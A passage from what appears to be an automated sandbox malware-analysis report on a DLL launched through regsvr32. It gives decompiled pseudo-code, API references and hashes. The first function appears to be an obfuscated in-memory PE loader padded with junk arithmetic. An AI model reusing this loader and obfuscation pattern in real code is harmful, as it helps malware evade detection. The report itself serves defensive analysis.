											_t585 = _t405;
											 *((intOrPtr*)(_t1250 + 0x10)) = _t585;
											if(_t585 != 0) {
												L21:
												_t836 =  *0x1004b0e8; // 0x0
												_t726 =  *0x1004b0ec; // 0x0
												_t213 = (_t836 -  *0x1004b0dc + 1) * _t836 + _t726 + 0x40; // 0x41
												_t840 =  *0x1004b0d8; // 0x0
												_t1064 =  *0x1004b0e4; // 0x0
												_t841 =  *0x1004b0e8; // 0x0
												_t410 = HeapAlloc(GetProcessHeap(), 8 + ((_t841 + 1) *  *0x1004b0dc + (_t726 * 0x3fffffff + _t840) *  *0x1004b0e0 + _t726 * 0x3fffffff + _t1064) * 4, (1 - _t726) *  *0x1004b0e0 + _t213);
												_t731 =  *0x1004b0e8; // 0x0
												_t411 =  *0x1004b0e0; // 0x0
												_t412 =  *0x1004b0ec; // 0x0
												_t1066 = _t410 + (_t731 - _t411 - _t412 +  *0x1004b0dc << 6);
												if(_t1066 != 0) {
													 *((intOrPtr*)(_t1066 + 4)) = _t585;
													_t413 =  *0x1004b0e0; // 0x0
													_t732 =  *0x1004b0ec; // 0x0
													_t224 = _t732 * 2; // -268738780
													_t853 =  *0x1004b0e8; // 0x0
													_t733 =  *0x1004b0d8; // 0x0
													 *((intOrPtr*)(_t1066 + 0x20)) =  *((intOrPtr*)(_t1250 + 0x68));
													asm("sbb eax, eax");
													 *((intOrPtr*)(_t1066 + 0x2c)) =  *((intOrPtr*)(_t1250 + 0x74));
													 *(_t1066 + 0x14) =  ~( ~((_t413 + _t732) * _t413 + _t224 + 0x00001000 - _t853 + _t733 << 0x00000001 &  *(_t951 + 0x16) & 0x0000ffff));
													 *((intOrPtr*)(_t1066 + 0x24)) =  *((intOrPtr*)(_t1250 + 0x6c));
													 *((intOrPtr*)(_t1066 + 0x34)) =  *((intOrPtr*)(_t1250 + 0x78));
													 *((intOrPtr*)(_t1066 + 0x28)) =  *((intOrPtr*)(_t1250 + 0x70));
													 *((intOrPtr*)(_t1066 + 0x1c)) = _t1168;
													_t423 =  *0x1004b0e8; // 0x0
													_t736 =  *0x1004b0e4; // 0x0
													 *((intOrPtr*)(_t1066 + 0x3c)) = ((3 - _t423 + _t423 * 2) *  *0x1004b0ec - 6) *  *0x1004b0e0 + _t736 + _t736 * 2 - _t423 + _t423 * 2 +  *((intOrPtr*)(_t1250 + 0x38));
													_t1169 =  *0x1004b0ec; // 0x0
													_t425 =  *0x1004b0e4; // 0x0
													_t738 =  *0x1004b0e0; // 0x0
													_t587 =  *0x1004b0d8; // 0x0
													_t739 =  *0x1004b0e8; // 0x0
													 *((intOrPtr*)(_t1250 + 0x2c)) =  *((intOrPtr*)(_t951 + 0x54));
													_t867 =  *0x1004b0e0; // 0x0
													_t433 = E10002C60((_t739 + _t739 * 2 - 3) * _t1169 +  *((intOrPtr*)(_t1250 + 0x64)) + _t587 * _t587 - _t867 + (_t587 * _t587 - _t867) * 2,  *((intOrPtr*)(_t951 + 0x54)) + (_t425 * _t1169 + _t738 + _t739 + _t587) * 2 + _t425 * _t1169 + _t738 + _t739 + _t587);
													_t1251 = _t1250 + 8;
													if(_t433 == 0) {
														L31:
														_push(_t1066);
														E10004DD0();
														goto L32;
													} else {
														_t743 =  *0x1004b0e0; // 0x0
														_t436 =  *0x1004b0e8; // 0x0
														_t437 =  *0x1004b0dc; // 0x0
														_t752 =  *0x1004b0e0; // 0x0
														_t1170 =  *0x1004b0e4; // 0x0
														_t438 =  *0x1004b0e8; // 0x0
														_t441 =  *((intOrPtr*)(_t1251 + 0x78))( *((intOrPtr*)(_t1251 + 0x1c)),  *(_t1251 + 0x34) + (_t587 * 0x7fffffff + _t752) * 2, 0x1000 + ((_t1170 + _t437) * 0x3fffffff + (_t1169 * 0x3fffffff + _t437 + 2) * _t1169 + _t438) * 4, 4 + (((_t436 + _t1169 + _t437) * 0x3fffffff + _t587 + 2) * _t437 + _t1169 + (3 - _t743 *  *0x1004b0e4) * _t436 + _t752 * 2) * 4,  *((intOrPtr*)(_t1251 + 0x78)));
														_t754 =  *0x1004b0dc; // 0x0
														_t590 =  *0x1004b0d8; // 0x0
														_t1174 =  *0x1004b0d8; // 0x0
														 *(_t1251 + 0x34) = _t441;
														_t442 =  *0x1004b0e8; // 0x0
														_t888 =  *0x1004b0e4; // 0x0
														_t444 =  *0x1004b0ec; // 0x0
														memcpy( *(_t1251 + 0x34),  *(_t1251 + 0x70), ((2 - _t442) *  *0x1004b0e4 + _t1174 + 2) *  *0x1004b0e0 - (_t754 * _t754 + _t442 + _t590) *  *0x1004b0ec - _t888 * _t442 - _t442 * _t754 - _t444 - _t444 - _t754 - _t754 +  *((intOrPtr*)(_t951 + 0x54)));
														_t604 =  *0x1004b0d8; // 0x0
														_t756 =  *0x1004b0dc; // 0x0
														_t448 =  *0x1004b0e0; // 0x0
														_t890 =  *0x1004b0ec; // 0x0
														_t891 =  *0x1004b0d8; // 0x0
														_t279 = _t448 + 0x2e9; // 0x2e9
														_t453 =  *((intOrPtr*)(_t1251 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_t1251 + 0x7c)) + 0x3c)) + (((_t448 + _t890) * _t890 + (_t604 - _t756 + 1) *  *0x1004b0e4 + _t448 + _t891) * 0xf8 + (_t448 * _t891 - 0xfa) *  *0x1004b0e8 - _t279 *  *0x1004b0e4 + (_t448 + 0xfffffffe) *  *0x1004b0ec + _t756 * 0x2e5) * 2;
														 *_t1066 = _t453;
														_t759 =  *0x1004b0e4; // 0x0
														_t1184 =  *0x1004b0e0; // 0x0
														_t895 =  *0x1004b0e8; // 0x0
														_t1187 =  *0x1004b0ec; // 0x0
														 *((intOrPtr*)(_t453 + 0x34)) = (2 - _t759 + _t759) *  *0x1004b0e0 +  *((intOrPtr*)(_t1251 + 0x30)) + (_t759 * 0x7ffffffd + ((_t759 *  *0x1004b0ec + _t895 + 1) * 0x7fffffff + _t1184 *  *0x1004b0d8 *  *0x1004b0dc) * _t895 + _t1187) * 2;
														_t900 =  *0x1004b0e8; // 0x0
														_t454 =  *0x1004b0e4; // 0x0
														_t761 =  *0x1004b0ec; // 0x0
														_t624 =  *0x1004b0d8; // 0x0
														_t293 = _t624 + 1; // 0x1
														_t463 =  *0x1004b0e0; // 0x0
														_push((0xc0 - (_t454 * _t900 * _t761 + _t454 * _t900 * _t761 * 2 << 6)) * _t900 - (_t293 * _t761 + _t293 * _t761 * 2 << 6) + _t1066);
														_push(_t951);
														_push((0xfffffffc -  *0x1004b0e4) *  *0x1004b0dc - (_t463 + 1) * _t900 * _t761 - _t761 * _t624 - _t900 +  *((intOrPtr*)(_t1251 + 0x88)));
														_push( *((intOrPtr*)(_t1251 + 0x84)));
														_t467 = E10002CA0();
														_t1251 = _t1251 + 0x30;
														if(_t467 == 0) {
															goto L31;
														} else {
															_t468 =  *0x1004b0e8; // 0x0
															_t765 =  *0x1004b0d8; // 0x0
															_t1200 =  *0x1004b0dc; // 0x0
															_t903 =  *0x1004b0e4; // 0x0
															_t905 =  *0x1004b0ec; // 0x0
															_t1202 = _t765 - _t905 + _t905;
															_t907 =  *0x1004b0dc; // 0x0
															_t299 = _t1202 - 2; // -2
															_t636 = (_t765 + _t299) * _t907 + (((_t468 * _t765 - _t1200) * _t765 - 2) *  *0x1004b0e0 + _t468 * _t468 - _t903 + _t903 - _t905) * 2 +  *((intOrPtr*)( *_t1066 + 0x34)) -  *((intOrPtr*)(_t951 + 0x34));
															 *((intOrPtr*)(_t1251 + 0x60)) = _t636;
															if(_t636 == 0) {
																 *((intOrPtr*)(_t1066 + 0x18)) = 1;
															} else {
																_t963 =  *0x1004b0e0; // 0x0
																_t1227 =  *0x1004b0e4; // 0x0
																_push( *((intOrPtr*)(_t1251 + 0x60)) + ((_t963 - _t1227 +  *0x1004b0ec << 1) - (_t468 *  *0x1004b0ec * _t907 * _t907 * _t907 + _t963 * _t468) * _t468 + _t907) * 4);
																_t970 =  *0x1004b0e0; // 0x0
																_t971 =  *0x1004b0e4; // 0x0
																_push((((_t970 * _t970 << 1) - _t971 + _t468 + _t468 - 2) * _t907 - (_t907 + 4 + _t765 * 2) * _t971 + (_t765 - _t468 + _t468) * 2 << 6) + _t1066);
																_t492 = E10003B80();
																_t924 =  *0x1004b0e0; // 0x0
																_t1251 = _t1251 + 8;
																 *((intOrPtr*)(_t1066 + 0x18)) = _t492 - (_t924 *  *0x1004b0d8 << 2);
															}
															_t469 =  *0x1004b0e4; // 0x0
															_t766 =  *0x1004b0e0; // 0x0
															_push((_t766 - _t469 *  *0x1004b0e8 *  *0x1004b0ec *  *0x1004b0dc << 8) + _t1066);
															_t473 = E10003F40();
															_t1251 = _t1251 + 4;
															if(_t473 == 0) {
																goto L31;
															} else {
																_t474 =  *0x1004b0e8; // 0x0
																_t770 =  *0x1004b0dc; // 0x0
																_t637 =  *0x1004b0e4; // 0x0
																_t318 = _t474 * 2; // 0x1
																_t954 =  *0x1004b0ec; // 0x0
																_push(((1 - _t474 - _t770) *  *0x1004b0d8 + (_t770 + _t318 + 1) *  *0x1004b0e0 + _t770 * 2 - _t637 - _t954 + _t474 << 8) + _t1066);
																_t475 = E10003570();
																_t1251 = _t1251 + 4;
																if(_t475 == 0) {
																	goto L31;
																} else {
																	_t913 =  *0x1004b0e0; // 0x0
																	_push((_t913 *  *0x1004b0d8 *  *0x1004b0dc << 7) + _t1066);
																	_t476 = E10003AD0();
																	_t1251 = _t1251 + 4;
																	if(_t476 != 0) {
																		_t478 =  *((intOrPtr*)( *_t1066 + 0x28));
																		 *((intOrPtr*)(_t1251 + 0x60)) = _t478;
																		if(_t478 == 0) {
																			 *(_t1066 + 0x38) = 0;
																			return _t1066;
																		} else {
																			if( *(_t1066 + 0x14) == 0) {
																				_t481 =  *0x1004b0d8; // 0x0
																				_t955 =  *0x1004b0e0; // 0x0
																				_t918 =  *0x1004b0ec; // 0x0
																				_t778 =  *0x1004b0e8; // 0x0
																				_t331 = _t955 * _t778 - _t918 + 1; // 0x1
																				 *(_t1066 + 0x38) = (_t778 * _t778 * _t481 * 4 - 4) * _t955 + (4 - _t481 * 4) * _t918 +  *((intOrPtr*)(_t1251 + 0x60)) + (_t481 + _t331) *  *0x1004b0dc * 4 +  *((intOrPtr*)(_t1251 + 0x10));
																				return _t1066;
																			} else {
																				_t780 =  *0x1004b0ec; // 0x0
																				_t921 =  *0x1004b0d8; // 0x0
																				_t956 =  *0x1004b0e4; // 0x0
																				_t642 =  *0x1004b0dc; // 0x0
																				_t962 =  *0x1004b0e0; // 0x0
																				 *0x1004d404 = (_t780 * _t921 - (_t956 + _t642) * _t956 - 3) *  *0x1004b0e8 - _t921 * _t642 + _t962 * _t962 - _t780 - _t780 +  *((intOrPtr*)(_t1251 + 0x60)) + _t780 * _t921 + _t921 +  *((intOrPtr*)(_t1251 + 0x10));
																				 *((intOrPtr*)(_t1066 + 0x10)) = 1;
																				return _t1066;
																			}
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
													}
												} else {
													_t1067 =  *0x1004b0d8; // 0x0
													_t928 =  *0x1004b0dc; // 0x0
													_t219 = ((_t1067 * _t928 - 1) * _t731 - 1) *  *0x1004b0e4 + _t412 + 0x8000; // 0x7fff
													 *((intOrPtr*)(_t1250 + 0x78))(_t585, 0, (_t412 * _t928 - 1) *  *0x1004b0e0 + _t219,  *((intOrPtr*)(_t1250 + 0x78)));
													return 0;
												}
											} else {
												_t789 =  *0x1004b0e4; // 0x0
												_t930 =  *0x1004b0dc; // 0x0
												_t1075 =  *0x1004b0d8; // 0x0
												_t1076 =  *0x1004b0ec; // 0x0
												_t194 = _t1076 - 4; // -4
												_t665 =  *0x1004b0e8; // 0x0
												_t498 =  *0x1004b0e0; // 0x0
												_t1084 =  *0x1004b0d8; // 0x0
												_t198 = (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084) * 2; // -3
												_t200 = _t1084 + 2; // 0x2
												_t1085 =  *0x1004b0ec; // 0x0
												_t668 =  *0x1004b0d8; // 0x0
												_t207 = (1 - _t668) * _t789 + _t1085 + _t930 + 0x1000; // 0x1001
												_t520 =  *0x1004b0e0; // 0x0
												_t1168 =  *((intOrPtr*)(_t1250 + 0x70));
												_t523 =  *_t1168(0,  *((intOrPtr*)(_t1250 + 0x20)) + _t520 *  *0x1004b0e8 * 2, (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084 + _t198 - 0x00000003) * _t789 - _t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002 + (_t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002) * 0x00000002 + 0x00002000 | (0x00000001 - _t668) * _t789 + _t1085 + _t930 + _t207, (1 - _t930) * _t665 + (1 - _t789 * _t930) * _t789 + _t498 + (_t1075 * _t1075 - _t789 * _t930 + _t194) * _t1076 + 4,  *((intOrPtr*)(_t1250 + 0x78)));
												_t1250 = _t1250 + 0x14;
												 *((intOrPtr*)(_t1250 + 0x10)) = _t523;
												if(_t523 == 0) {
													goto L32;
												} else {
													_t585 = _t523;
													goto L21;
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x10005263
0x10005269
0x10005271
0x10005278
0x10005291
0x1000529e
0x100052a9
0x100052b4
0x100052bf
0x100052d2
0x100052da
0x10005304
0x1000530c
0x10006014
0x1000601a
0x10005312
0x10005312
0x10005318
0x1000531b
0x10005321
0x10005324
0x1000533f
0x10005350
0x10005361
0x00000000
0x10005367
0x1000536c
0x1000536f
0x10005377
0x1000537d
0x10005392
0x100053db
0x100053f4
0x10005409
0x00000000
0x1000540f
0x1000540f
0x10005434
0x10005436
0x10005444
0x10005466
0x1000546d
0x10005477
0x10005484
0x10005488
0x00000000
0x1000548e
0x1000548e
0x100054b4
0x100054cb
0x00000000
0x100054d1
0x100054d4
0x100054d8
0x100054ec
0x10005505
0x00000000
0x1000550b
0x1000550b
0x1000551b
0x10005537
0x10005542
0x1000555f
0x10005575
0x10005579
0x1000557d
0x10005592
0x10005594
0x100056bc
0x100056c2
0x1000559a
0x100055a5
0x100055b0
0x100055b4
0x100055ba
0x100055be
0x100055c4
0x100055c8
0x100055cd
0x100055d1
0x1000563e
0x10005642
0x100055d3
0x100055e1
0x100055ec
0x10005600
0x10005600
0x10005650
0x10005654
0x10005699
0x10005656
0x10005656
0x10005686
0x10005693
0x10005693
0x100056a3
0x100056ac
0x100056b0
0x100056b0
0x100056b0
0x100056ba
0x100056cf
0x100056fb
0x10005701
0x10005706
0x1000570c
0x10005712
0x10005724
0x10005753
0x10005757
0x1000575c
0x10005765
0x10005770
0x10005783
0x10005788
0x10005797
0x1000579d
0x100057a1
0x100057b3
0x100057cf
0x100057d5
0x100057dd
0x100057f5
0x100057fe
0x10005803
0x00000000
0x10005809
0x10005809
0x10005814
0x10005827
0x1000582e
0x10005845
0x1000584d
0x1000585d
0x10005894
0x100058c0
0x100058c7
0x100058cd
0x100058e6
0x10005907
0x10005909
0x1000590c
0x10005910
0x10005914
0x10005a04
0x10005a04
0x10005a0a
0x10005a34
0x10005a38
0x10005a3e
0x10005a4f
0x10005a72
0x10005a78
0x10005a80
0x10005a89
0x10005a99
0x10005a9b
0x10005ae8
0x10005aeb
0x10005af0
0x10005afc
0x10005b03
0x10005b09
0x10005b23
0x10005b2c
0x10005b2e
0x10005b33
0x10005b3a
0x10005b41
0x10005b44
0x10005b47
0x10005b4a
0x10005b52
0x10005b7d
0x10005b80
0x10005b86
0x10005b8b
0x10005b94
0x10005b9f
0x10005ba7
0x10005bb8
0x10005bd3
0x10005bd8
0x10005bdd
0x10006008
0x10006008
0x10006009
0x00000000
0x10005be3
0x10005be3
0x10005bf5
0x10005c07
0x10005c27
0x10005c47
0x10005c4f
0x10005c75
0x10005c79
0x10005c7f
0x10005c85
0x10005c90
0x10005c94
0x10005cbf
0x10005ccf
0x10005cec
0x10005cf2
0x10005cf8
0x10005d08
0x10005d13
0x10005d23
0x10005d36
0x10005d70
0x10005d72
0x10005d74
0x10005d7a
0x10005d8e
0x10005da9
0x10005dd5
0x10005dd8
0x10005dde
0x10005de3
0x10005dec
0x10005e05
0x10005e13
0x10005e1e
0x10005e30
0x10005e4e
0x10005e4f
0x10005e50
0x10005e55
0x10005e5a
0x00000000
0x10005e60
0x10005e60
0x10005e65
0x10005e6b
0x10005e8c
0x10005e96
0x10005ea2
0x10005ea4
0x10005eaa
0x10005eba
0x10005ebd
0x10005ec1
0x10005f58
0x10005ec7
0x10005ec7
0x10005ee6
0x10005f04
0x10005f05
0x10005f10
0x10005f38
0x10005f39
0x10005f3e
0x10005f4e
0x10005f53
0x10005f53
0x10005f5f
0x10005f79
0x10005f86
0x10005f87
0x10005f8c
0x10005f91
0x00000000
0x10005f93
0x10005f93
0x10005f98
0x10005f9e
0x10005fa4
0x10005fc1
0x10005fd5
0x10005fd6
0x10005fdb
0x10005fe0
0x00000000
0x10005fe2
0x10005fe2
0x10005ffb
0x10005ffc
0x10006001
0x10006006
0x1000601d
0x10006022
0x10006026
0x1000610e
0x1000611d
0x1000602c
0x10006031
0x100060a5
0x100060aa
0x100060b0
0x100060c4
0x100060d4
0x10006101
0x1000610c
0x10006033
0x10006033
0x10006039
0x1000603f
0x10006045
0x1000606d
0x1000608f
0x10006095
0x100060a4
0x100060a4
0x10006031
0x00000000
0x00000000
0x00000000
0x10006006
0x10005fe0
0x10005f91
0x10005e5a
0x10005a9d
0x10005aa1
0x10005aa8
0x10005acc
0x10005ad7
0x10005ae7
0x10005ae7
0x1000591a
0x1000591a
0x10005920
0x1000592b
0x10005936
0x10005943
0x10005947
0x10005957
0x10005981
0x10005989
0x1000598d
0x100059a0
0x100059ae
0x100059cb
0x100059d2
0x100059e7
0x100059f1
0x100059f3
0x100059f8
0x100059fc
0x00000000
0x10005a02
0x10005a02
0x00000000
0x10005a02
0x100059fc
0x10005914
0x10005803
0x10005505
0x100054cb
0x10005488
0x10005409
0x10005361

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 100056FB
GetProcessHeap.KERNEL32(00000000,00000041), ref: 10005A6B
HeapAlloc.KERNEL32(00000000), ref: 10005A72
memcpy.MSVCRT ref: 10005CEC

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Heap$AllocInfoNativeProcessSystemmemcpy
String ID:
API String ID: 1755227880-0
Opcode ID: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
Instruction ID: 53ea61cdfd61ec98e79d57da9c3d37a8995a084b4a0616e836109eb4d92bec45
Opcode Fuzzy Hash: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
Instruction Fuzzy Hash: 5A92D7326407298FD318DF6CCEC2546B7A9F789311B05863AD925DB3B5E670F909CB88

Uniqueness

Uniqueness Score: -1.00%

Function 10037446 Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E10037446(signed char* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				char _v32;
				char _v40;
				char _v48;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t45;
				void* _t49;
				void* _t50;
				signed int _t71;
				signed char* _t73;
				signed int _t82;
				signed char* _t85;
				void* _t87;
				void* _t89;
				void* _t91;
				void* _t92;
				void* _t94;

				_t73 = __ecx;
				_t89 = _t94;
				_push(__ecx);
				_push(__ecx);
				_t85 = __ecx;
				_t1 = _t85 + 0x1c; // 0x1004f010
				_t42 = _t1;
				_v8 = _t42;
				EnterCriticalSection(_t42);
				_t3 = _t85 + 4; // 0x20
				_t43 =  *_t3;
				_t4 = _t85 + 8; // 0x3
				if( *_t4 >= _t43) {
					L6:
					_t82 = 1;
					if(_t43 <= 1) {
						L11:
						_t20 = _t43 + 0x20; // 0x40
						_t71 = _t20;
						_t21 = _t85 + 0x10; // 0x2d65510
						_t44 =  *_t21;
						if(_t44 != 0) {
							_t45 = GlobalHandle(_t44);
							_v12 = _t45;
							GlobalUnlock(_t45);
							_t49 = GlobalReAlloc(_v12, _t71 << 3, 0x2002);
						} else {
							_t49 = GlobalAlloc(2, _t71 << 3); // executed
						}
						if(_t49 != 0) {
							_t50 = GlobalLock(_t49);
							_t26 = _t85 + 4; // 0x20
							_v12 = _t50;
							E10011C50(_t50 +  *_t26 * 8, 0, _t71 -  *_t26 << 3);
							 *(_t85 + 4) = _t71;
							 *(_t85 + 0x10) = _v12;
							goto L19;
						} else {
							_t24 = _t85 + 0x10; // 0x2d65510
							_t87 =  *_t24;
							if(_t87 != 0) {
								GlobalLock(GlobalHandle(_t87));
							}
							LeaveCriticalSection(_v8);
							_push(_t89);
							_t91 = _t94;
							_push(_t73);
							_v32 = 0x1004d418;
							E10011C0F( &_v32, 0x10045dc0);
							asm("int3");
							_push(_t91);
							_t92 = _t94;
							_push(_t73);
							_v40 = 0x1004d4b0;
							E10011C0F( &_v40, 0x10045e04);
							asm("int3");
							_push(_t92);
							_push(_t73);
							_v48 = 0x1004d548;
							E10011C0F( &_v48, 0x10045e48);
							asm("int3");
							return _t73[0x70];
						}
					} else {
						_t17 = _t85 + 0x10; // 0x2d65510
						_t73 =  *_t17 + 8;
						while(( *_t73 & 0x00000001) != 0) {
							_t82 = _t82 + 1;
							_t73 =  &(_t73[8]);
							if(_t82 < _t43) {
								continue;
							}
							break;
						}
						if(_t82 < _t43) {
							goto L19;
						} else {
							goto L11;
						}
					}
				} else {
					_t12 = __esi + 0x10; // 0x2d65510
					__ecx =  *_t12;
					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
						L19:
						_t33 = _t85 + 0xc; // 0x3
						if(_t82 >=  *_t33) {
							_t34 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t85 + 0xc)) = _t34;
						}
						_t36 = _t85 + 0x10; // 0x2d65510
						 *( *_t36 + _t82 * 8) =  *( *_t36 + _t82 * 8) | 0x00000001;
						_t40 = _t82 + 1; // 0x4
						 *((intOrPtr*)(_t85 + 8)) = _t40;
						LeaveCriticalSection(_v8);
						return _t82;
					} else {
						goto L6;
					}
				}
			}

0x10037446
0x10037447
0x10037449
0x1003744a
0x1003744d
0x1003744f
0x1003744f
0x10037454
0x10037457
0x1003745d
0x1003745d
0x10037460
0x10037465
0x10037474
0x10037476
0x10037479
0x10037496
0x10037496
0x10037496
0x10037499
0x10037499
0x1003749e
0x100374b1
0x100374b8
0x100374bb
0x100374cf
0x100374a0
0x100374a8
0x100374a8
0x100374d7
0x100374fd
0x10037503
0x1003750e
0x10037517
0x10037522
0x10037525
0x00000000
0x100374d9
0x100374d9
0x100374d9
0x100374de
0x100374e8
0x100374e8
0x100374f1
0x1001ce3b
0x1001ce3c
0x1001ce3e
0x1001ce48
0x1001ce4f
0x1001ce54
0x1001ce55
0x1001ce56
0x1001ce58
0x1001ce62
0x1001ce69
0x1001ce6e
0x1001ce6f
0x1001ce72
0x1001ce7c
0x1001ce83
0x1001ce88
0x1001ce8c
0x1001ce8c
0x1003747b
0x1003747b
0x1003747e
0x10037481
0x10037486
0x10037487
0x1003748c
0x00000000
0x00000000
0x00000000
0x1003748c
0x10037490
0x00000000
0x00000000
0x00000000
0x00000000
0x10037490
0x10037467
0x10037467
0x10037467
0x1003746e
0x10037528
0x10037528
0x1003752b
0x1003752d
0x10037530
0x10037530
0x10037533
0x1003753c
0x1003753f
0x10037542
0x10037545
0x10037551
0x00000000
0x00000000
0x00000000
0x1003746e

APIs

EnterCriticalSection.KERNEL32(1004F010,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 10037457
GlobalAlloc.KERNELBASE(00000002,00000040,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374A8
GlobalHandle.KERNEL32(02D65510), ref: 100374B1
GlobalUnlock.KERNEL32(00000000,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374BB
GlobalReAlloc.KERNEL32 ref: 100374CF
GlobalHandle.KERNEL32(02D65510), ref: 100374E1
GlobalLock.KERNEL32 ref: 100374E8
LeaveCriticalSection.KERNEL32(?,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374F1
GlobalLock.KERNEL32 ref: 100374FD
LeaveCriticalSection.KERNEL32(?), ref: 10037545

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
Instruction ID: feedd15bf3e86fe32dc878be1727d2ab34921a7f2ef65c1774b7ebc5d14265f1
Opcode Fuzzy Hash: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
Instruction Fuzzy Hash: 8231AB71A00759AFD722CFB5CC88E5ABBF9FB44241B018929E896DB622D730F900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013AD4 Relevance: 7.5, APIs: 5, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10013AD4() {
				int _t2;
				void* _t8;
				void* _t14;
				void** _t15;
				void* _t21;
				void* _t23;

				if( *0x10050a64 == 3) {
					_t8 = 0;
					_t21 =  *0x10050a48 - _t8; // 0x0
					if(_t21 > 0) {
						_t14 =  *0x10050a4c; // 0x0
						_t15 = _t14 + 0xc;
						do {
							VirtualFree( *_t15, 0x100000, 0x4000);
							VirtualFree( *_t15, 0, 0x8000);
							HeapFree( *0x10050a60, 0, _t15[1]);
							_t15 =  &(_t15[5]);
							_t8 = _t8 + 1;
							_t23 = _t8 -  *0x10050a48; // 0x0
						} while (_t23 < 0);
					}
					HeapFree( *0x10050a60, 0,  *0x10050a4c);
				}
				_t2 = HeapDestroy( *0x10050a60); // executed
				return _t2;
			}

0x10013adb
0x10013ade
0x10013ae0
0x10013aed
0x10013af0
0x10013afd
0x10013b00
0x10013b0c
0x10013b17
0x10013b24
0x10013b26
0x10013b29
0x10013b2a
0x10013b2a
0x10013b33
0x10013b42
0x10013b45
0x10013b4c
0x10013b52

APIs

VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B0C
VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B17
HeapFree.KERNEL32(00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B24
HeapFree.KERNEL32(00000000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B42
HeapDestroy.KERNELBASE(100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B4C

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Free$Heap$Virtual$Destroy
String ID:
API String ID: 782257640-0
Opcode ID: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
Instruction ID: ae232e1038543a87835a4795d6aa86e40daf30d89f668916441cffa0c1b4fc0d
Opcode Fuzzy Hash: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
Instruction Fuzzy Hash: 81F0493AA00328AFFB21DF15DCC5F0ABB75F741754F258024F6456A4B2C6B36850EB19

Uniqueness

Uniqueness Score: -1.00%

Function 100350EA Relevance: 4.6, APIs: 3, Instructions: 60
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

